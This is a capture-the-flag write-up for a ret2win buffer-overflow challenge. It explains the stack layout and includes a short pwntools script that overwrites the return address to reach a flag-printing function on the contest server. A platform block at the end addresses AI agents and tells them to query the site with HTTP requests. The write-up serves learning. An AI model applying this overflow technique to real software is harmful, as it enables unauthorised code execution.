# Free flag

> Simple ret2win exploit.

It calls read on rbp-0x20, reading 0x38 bytes.

This is enough for 16 bytes after RBP.

We simply send 0x28 junk bytes + ret gadget + win\_win function address(win\_win is a function executing cat flag.txt whilst the ret gadget is for stack alignment)

For some reason I had to put an interactive session just when I connected to the server and hit control c so that the exploit continued in order for it to work...

```python
from pwn import *
e = ELF("./chall")
NUM_TO_RET = 0x20 + 8
padding = b'A' * NUM_TO_RET
retgadget = 0x00000000004005ae # ret
payload = padding + p64(retgadget) + p64(e.symbols['win_win'])
#p = e.process()
p = remote('europe.pwn.zh3r0.ml', 3456)
p.interactive()
p.sendline(payload)
p.interactive()
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-winrars.gitbook.io/writeups/2020-writeups/zh3r0-ctf/pwn/free-flag.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.